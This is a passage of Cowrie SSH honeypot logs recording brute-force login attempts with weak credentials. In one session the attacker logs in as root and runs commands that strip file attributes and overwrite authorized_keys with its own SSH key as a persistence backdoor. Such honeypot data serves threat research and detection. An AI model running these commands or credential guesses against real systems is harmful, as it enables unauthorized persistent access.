{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:05:17.003648Z","src_ip":"196.251.115.108","session":"816e44382390"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:05:17.004763Z","src_ip":"196.251.115.108","session":"816e44382390"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123123","message":"login attempt [oracle/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:05:19.786642Z","src_ip":"196.251.115.108","session":"816e44382390"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:21.268910Z","src_ip":"196.251.115.108","session":"816e44382390"}
{"eventid":"cowrie.session.connect","src_ip":"197.5.145.102","src_port":46363,"dst_ip":"1.2.3.4","dst_port":22,"session":"833021bd9f84","protocol":"ssh","message":"New connection: 197.5.145.102:46363 (1.2.3.4:22) [session: 833021bd9f84]","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.105819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.106743Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.155467Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2021","message":"login attempt [root/Password2021] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.400928Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:05:40.574439Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.575271Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.576247Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.627868Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:05:40.811337Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.812081Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.856912Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.857808Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.session.connect","src_ip":"197.5.145.102","src_port":46364,"dst_ip":"1.2.3.4","dst_port":22,"session":"4444e4723175","protocol":"ssh","message":"New connection: 197.5.145.102:46364 (1.2.3.4:22) [session: 4444e4723175]","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.903199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.903913Z","src_ip":"197.5.145.102","session":"4444e4723175"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:05:40.955412Z","src_ip":"197.5.145.102","session":"4444e4723175"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:05:41.184962Z","src_ip":"197.5.145.102","session":"4444e4723175"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.229916Z","src_ip":"197.5.145.102","session":"4444e4723175"}
{"eventid":"cowrie.session.connect","src_ip":"197.5.145.102","src_port":46365,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fe9e47202d3","protocol":"ssh","message":"New connection: 197.5.145.102:46365 (1.2.3.4:22) [session: 6fe9e47202d3]","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.278619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.279500Z","src_ip":"197.5.145.102","session":"6fe9e47202d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.331486Z","src_ip":"197.5.145.102","session":"6fe9e47202d3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.559083Z","src_ip":"197.5.145.102","session":"6fe9e47202d3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.607871Z","src_ip":"197.5.145.102","session":"833021bd9f84"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:42.608932Z","src_ip":"197.5.145.102","session":"6fe9e47202d3"}
{"eventid":"cowrie.session.closed","duration":35.18644881248474,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:05:52.167086Z","src_ip":"183.107.20.84","session":"2e47b4c9b90f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42364,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4aae5928976","protocol":"ssh","message":"New connection: 196.251.115.108:42364 (1.2.3.4:22) [session: f4aae5928976]","sensor":"my-vps","timestamp":"2025-08-24T23:06:03.219998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:06:03.489620Z","src_ip":"196.251.115.108","session":"f4aae5928976"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:06:04.003736Z","src_ip":"196.251.115.108","session":"f4aae5928976"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"111111","message":"login attempt [oracle/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:06:07.079203Z","src_ip":"196.251.115.108","session":"f4aae5928976"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:06:08.138775Z","src_ip":"196.251.115.108","session":"f4aae5928976"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":48566,"dst_ip":"1.2.3.4","dst_port":22,"session":"d723d915ff57","protocol":"ssh","message":"New connection: 196.251.115.108:48566 (1.2.3.4:22) [session: d723d915ff57]","sensor":"my-vps","timestamp":"2025-08-24T23:06:51.155039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:06:52.172160Z","src_ip":"196.251.115.108","session":"d723d915ff57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:06:52.172827Z","src_ip":"196.251.115.108","session":"d723d915ff57"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234567","message":"login attempt [oracle/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:06:54.758092Z","src_ip":"196.251.115.108","session":"d723d915ff57"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:06:56.151187Z","src_ip":"196.251.115.108","session":"d723d915ff57"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":57556,"dst_ip":"1.2.3.4","dst_port":22,"session":"8459dba64ffe","protocol":"ssh","message":"New connection: 196.251.115.108:57556 (1.2.3.4:22) [session: 8459dba64ffe]","sensor":"my-vps","timestamp":"2025-08-24T23:07:38.611192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:07:38.979972Z","src_ip":"196.251.115.108","session":"8459dba64ffe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:07:38.980796Z","src_ip":"196.251.115.108","session":"8459dba64ffe"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:07:42.722511Z","src_ip":"196.251.115.108","session":"8459dba64ffe"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:07:43.850626Z","src_ip":"196.251.115.108","session":"8459dba64ffe"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":32796,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f472097ccd","protocol":"ssh","message":"New connection: 196.251.115.108:32796 (1.2.3.4:22) [session: 35f472097ccd]","sensor":"my-vps","timestamp":"2025-08-24T23:08:25.455085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:08:25.735359Z","src_ip":"196.251.115.108","session":"35f472097ccd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:08:25.736085Z","src_ip":"196.251.115.108","session":"35f472097ccd"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:08:29.457298Z","src_ip":"196.251.115.108","session":"35f472097ccd"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:08:30.605159Z","src_ip":"196.251.115.108","session":"35f472097ccd"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":39348,"dst_ip":"1.2.3.4","dst_port":22,"session":"c74d3e73d70d","protocol":"ssh","message":"New connection: 196.251.115.108:39348 (1.2.3.4:22) [session: c74d3e73d70d]","sensor":"my-vps","timestamp":"2025-08-24T23:09:12.006274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:09:12.659684Z","src_ip":"196.251.115.108","session":"c74d3e73d70d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@opens